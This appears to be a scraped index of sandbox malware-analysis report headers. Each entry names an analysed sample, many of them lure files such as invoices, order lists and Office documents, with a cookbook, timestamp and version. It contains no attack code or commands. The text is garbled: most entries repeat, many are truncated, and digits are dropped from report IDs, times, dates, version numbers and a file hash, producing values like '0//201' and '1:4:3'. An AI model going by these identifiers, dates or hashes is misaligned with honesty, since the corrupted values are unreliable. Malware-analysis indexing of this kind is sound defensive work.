ID: Cookbook: urldownload.jbs Time: 18:48:38 Date: 19/06/2018 Version: ID: 64646 Cookbook: urldownload.jbs Time: 1:4:3 Date: 19/06/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

ID: Sample Name: MSM- 24_Supply_List RU_518.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 17:15:48 Date: 19/06/2018 Version: 22.0.

ID: Sample Name: MSM- 24_Supply_List RU_518.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 17:15:48 Date: 19/06/2018 Version: 22.0. ID: 64635 Sample Name: MSM- 24_Supply_List RU_518.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 17::48 Date: 1/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection

ID: Sample Name: fly.jse Cookbook: default.jbs Time: 18:17:26 Date: 11/11/2017 Version:

ID: Sample Name: fly.jse Cookbook: default.jbs Time: 18:17:26 Date: 11/11/2017 Version: ID: 371 Sample Name: fly.jse Cookbook: default.jbs Time: 1:17:2 Date: 11/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence Classification

ID: Sample Name: quzpecasrh Cookbook: default.jbs Time: 16:55:54 Date: 07/10/2017 Version:

ID: Sample Name: quzpecasrh Cookbook: default.jbs Time: 16:55:54 Date: 07/10/2017 Version: ID: 3393 Sample Name: quzpecasrh Cookbook: default.jbs Time: 1:55:54 Date: 0//201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

ID: Cookbook: browseurl.jbs Time: 18:05:31 Date: 26/12/2017 Version:

ID: Cookbook: browseurl.jbs Time: 18:05:31 Date: 26/12/2017 Version: ID: 41000 Cookbook: browseurl.jbs Time: 1:05:31 Date: 26/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Cookbook: urldownload.jbs Time: 22:26:00 Date: 30/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 22:26:00 Date: 30/12/2017 Version: ID: 41304 Cookbook: urldownload.jbs Time: 22:26:00 Date: 30/12/2017 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview

ID: Cookbook: urldownload.jbs Time: 02:55:04 Date: 01/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 02:55:04 Date: 01/02/2018 Version: ID: 4441 Cookbook: urldownload.jbs Time: 02:55:04 Date: 01/02/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

ID: Sample Name: Serial.txt Cookbook: default.jbs Time: 02:59:20 Date: 07/05/2018 Version:

ID: Sample Name: Serial.txt Cookbook: default.jbs Time: 02:59:20 Date: 07/05/2018 Version: ID: 58133 Sample Name: Serial.txt Cookbook: default.jbs Time: 02:5:20 Date: 0/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: SSI Set Details.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 01:14:07 Date: 13/04/2018 Version: 22.0.

ID: Sample Name: SSI Set Details.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 01:14:07 Date: 13/04/2018 Version: 22.0. ID: 54478 Sample Name: SSI Set Details.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 01:14:07 Date: /04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

ID: Sample Name: Luxus.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 10:22:08 Date: 09/01/2018 Version:

ID: Sample Name: Luxus.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 10:22:08 Date: 09/01/2018 Version: ID: 42035 Sample Name: Luxus.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 10:22:08 Date: 09/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version:

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: ID: 45263 Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification

ID: Sample Name: testfiletestfile.txt Cookbook: default.jbs Time: 15:24:30 Date: 06/07/2018 Version:

ID: Sample Name: testfiletestfile.txt Cookbook: default.jbs Time: 15:24:30 Date: 06/07/2018 Version: ID: 6045 Sample Name: testfiletestfile.txt Cookbook: default.jbs Time: 15:24:30 Date: 06/0/201 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0. ID: 56519 Sample Name: 20180542 INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview Information

ID: Sample Name: TO_HM_CROWN PR#U0130NCE MOHAMMED B#U0130N SALMAN - Dear Prime Minister.doc Cookbook: defaultwindowsofficecookbook.

ID: Sample Name: TO_HM_CROWN PR#U0130NCE MOHAMMED B#U0130N SALMAN - Dear Prime Minister.doc Cookbook: defaultwindowsofficecookbook. ID: 63341 Sample Name: TO_HM_CROWN PR#U0130NCE MOHAMMED B#U0130N SALMAN - Dear Prime Minister.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 08:43:14 Date: 10/06/2018 Version: 22.0.0 Table of Contents

ID: Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version:

ID: Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version: ID: 41280 Sample Name: Liste_az.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 00:17:54 Date: 30/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:55:50 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

ID: Sample Name: text_0.txt Cookbook: default.jbs Time: 16:20:15 Date: 12/01/2018 Version:

ID: Sample Name: text_0.txt Cookbook: default.jbs Time: 16:20:15 Date: 12/01/2018 Version: ID: 4253 Sample Name: text_0.txt Cookbook: default.jbs Time: 1:20:15 Date: 12/01/2018 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: Payment_Remittance#.xps Cookbook: defaultwindowsofficecookbook.jbs Time: 01:35:46 Date: 20/09/2018 Version: 23.0.

ID: Sample Name: Payment_Remittance#.xps Cookbook: defaultwindowsofficecookbook.jbs Time: 01:35:46 Date: 20/09/2018 Version: 23.0. ID: 25 Sample Name: Payment_Remittance#.xps Cookbook: defaultwindowsofficecookbook.jbs Time: 01:35:4 Date: 20/09/201 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Payment_Remittance#.xps

ID: Cookbook: browseurl.jbs Time: 14:02:12 Date: 23/11/2018 Version: Fire Opal

ID: Cookbook: browseurl.jbs Time: 14:02:12 Date: 23/11/2018 Version: Fire Opal ID: 92832 Cookbook: browseurl.jbs Time: 14:02:12 Date: 23/11/2018 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://www.winsupport.ml Overview Information Detection Confidence

ID: Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version:

ID: Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version: ID: 40269 Sample Name: scan00.html Cookbook: default.jbs Time: 22:21:27 Date: 16/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0.

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0. ID: 36381 Sample Name: New invoice 1385371761.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:4:06 Date: 07/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview

ID: Sample Name: E DA5e8a0c01b.txt Cookbook: default.jbs Time: 15:35:01 Date: 18/04/2018 Version:

ID: Sample Name: E DA5e8a0c01b.txt Cookbook: default.jbs Time: 15:35:01 Date: 18/04/2018 Version: ID: 55401 Sample Name: E203182DA5e8a0c01b.txt Cookbook: default.jbs Time: 15:35:01 Date: 18/04/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0. ID: 34737 Sample Name: 20170927_655387.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version:

ID: Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:34 Date: 26/07/2018 Version: ID: 90 Sample Name: lt.pak Cookbook: default.jbs Time: 12:40:4 Date: 2/0/201 Version: 2.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

ID: Cookbook: browseurl.jbs Time: 19:21:50 Date: 15/10/2017 Version:

ID: Cookbook: browseurl.jbs Time: 19:21:50 Date: 15/10/2017 Version: ID: 34266 Cookbook: browseurl.jbs Time: 19:21:50 Date: 15/10/2017 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Sample Name: MacKeeper.dmg Cookbook: default.jbs Time: 11:09:32 Date: 02/06/2018 Version:

ID: Sample Name: MacKeeper.dmg Cookbook: default.jbs Time: 11:09:32 Date: 02/06/2018 Version: ID: 22 Sample Name: MacKeeper.dmg Cookbook: default.jbs Time: 11:0:2 Date: 02/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: FORMP16T.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 09:39:29 Date: 28/05/2018 Version:

ID: Sample Name: FORMP16T.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 09:39:29 Date: 28/05/2018 Version: ID: 61383 Sample Name: FORMP16T.docx Cookbook: defaultwindowsofficecookbook.jbs Time: 09:39:29 Date: 28/05/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information

ID: Sample Name: NEW ORDER LIST.jar Cookbook: default.jbs Time: 10:19:47 Date: 19/02/2018 Version:

ID: Sample Name: NEW ORDER LIST.jar Cookbook: default.jbs Time: 10:19:47 Date: 19/02/2018 Version: ID: 47020 Sample Name: NEW ORDER LIST.jar Cookbook: default.jbs Time: :19:47 Date: 19/02/201 Version: 21.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence

ID: Cookbook: urldownload.jbs Time: 20:47:24 Date: 09/12/2017 Version:

ID: Cookbook: urldownload.jbs Time: 20:47:24 Date: 09/12/2017 Version: ID: 0 Cookbook: urldownload.jbs Time: 20:4:24 Date: 0/12/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date:

ID: Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: ID: 244 Sample Name: Commercial Card Services CTO Quality Control Checklist v9.docm Cookbook: defaultwindowsofficecookbook.jbs Time: 15:52:31 Date: 05/10/201 Version: 24.0.0 Fire Opal Table of Contents

ID: Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version: ID: 50608 Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

ID: Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:54 Date: 07/06/2018 Version:

ID: Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:54 Date: 07/06/2018 Version: ID: 001 Sample Name: dronefly.apk Cookbook: default.jbs Time: 10:24:4 Date: 0/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: test Cookbook: default.jbs Time: 09:46:13 Date: 21/05/2018 Version:

ID: Sample Name: test Cookbook: default.jbs Time: 09:46:13 Date: 21/05/2018 Version: ID: 042 Sample Name: test Cookbook: default.jbs Time: 09:4:1 Date: 21/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

ID: Sample Name: Coss, Daniel.vcf Cookbook: default.jbs Time: 15:16:47 Date: 21/06/2018 Version:

ID: Sample Name: Coss, Daniel.vcf Cookbook: default.jbs Time: 15:16:47 Date: 21/06/2018 Version: ID: 6467 Sample Name: Coss, Daniel.vcf Cookbook: default.jbs Time: 15:16:47 Date: 21/06/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751.evaljs.js Cookbook: default.jbs Time: 16:44:00 Date:

ID: Sample Name: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751.evaljs.js Cookbook: default.jbs Time: 16:44:00 Date: ID: 33355 Sample Name: ff2c8cadaa0fd8da138ccefce3e001f53a5dceccd45b15ae23f4d51.evaljs.js Cookbook: default.jbs Time: 1:44:00 Date: 04//201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report

ID: Sample Name: 11#Ucb#Uae#Uc4#Ube#Ue5#Ubb#UaafNOnOJTVYQ.exe Cookbook: default.jbs Time: 09:47:21 Date: 02/02/2018 Version: 20.0.

ID: Sample Name: 11#Ucb#Uae#Uc4#Ube#Ue5#Ubb#UaafNOnOJTVYQ.exe Cookbook: default.jbs Time: 09:47:21 Date: 02/02/2018 Version: 20.0. ID: 4457 Sample Name: #Ucb#Uae#Uc4#Ube#Ue5#Ubb#UaafNOnOJTVYQ.exe Cookbook: default.jbs Time: 09:47:21 Date: 02/02/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General

ID: Sample Name: Swift details.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 17:14:48 Date: 21/06/2018 Version: 22.0.

ID: Sample Name: Swift details.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 17:14:48 Date: 21/06/2018 Version: 22.0. ID: 64992 Sample Name: Swift details.xls Cookbook: defaultwindowsofficecookbook.jbs Time: 17::48 Date: 21/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

ID: Sample Name: promo_50_ iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version:

ID: Sample Name: promo_50_ iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version: ID: 63041 Sample Name: promo_50_57443456.iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence

ID: Cookbook: urldownload.jbs Time: 21:28:55 Date: 28/06/2018 Version:

ID: Cookbook: urldownload.jbs Time: 21:28:55 Date: 28/06/2018 Version: ID: 6600 Cookbook: urldownload.jbs Time: 21:2:55 Date: 2/06/201 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature Overview Networking:

ID: Sample Name: 5GeZNwROcB.bin Cookbook: default.jbs Time: 15:22:54 Date: 30/11/2017 Version:

ID: Sample Name: 5GeZNwROcB.bin Cookbook: default.jbs Time: 15:22:54 Date: 30/11/2017 Version: ID: 82 Sample Name: GeZNwROcB.bin Cookbook: default.jbs Time: 1:22:4 Date: 0/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version:

ID: Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/05/2018 Version: ID: 09 Sample Name: dialog.nvp Cookbook: default.jbs Time: 00:09:12 Date: 10/0/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24:33 Date: 15/12/2017 Version:

ID: Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24:33 Date: 15/12/2017 Version: ID: 4019 Sample Name: faktury_pdf.rar Cookbook: default.jbs Time: 12:24: Date: 1/12/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version:

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version: ID: 42417 Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.

ID: Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version:

ID: Cookbook: browseurl.jbs Time: 13:47:53 Date: 16/02/2018 Version:

ID: Sample Name: paint.net install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version:

ID: Sample Name: gpg4win exe.sig Cookbook: default.jbs Time: 21:44:31 Date: 02/02/2018 Version:

ID: Cookbook: urldownload.jbs Time: 16:10:39 Date: 07/12/2017 Version:

ID: Cookbook: browseurl.jbs Time: 18:10:52 Date: 18/05/2018 Version:

ID: Sample Name: vlaue.exe Cookbook: default.jbs Time: 18:54:49 Date: 26/01/2018 Version:

ID: Sample Name: oq5wdjgk2r.exe Cookbook: default.jbs Time: 20:25:47 Date: 22/11/2017 Version:

ID: Sample Name: PO xls Cookbook: defaultwindowsofficecookbook.jbs Time: 03:13:36 Date: 08/01/2018 Version:

ID: Sample Name: Request.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 15:59:16 Date: 22/11/2017 Version:

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date:

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version:

ID: Sample Name: Unconfirmed crdownload Cookbook: default.jbs Time: 22:58:07 Date: 08/11/2017 Version:
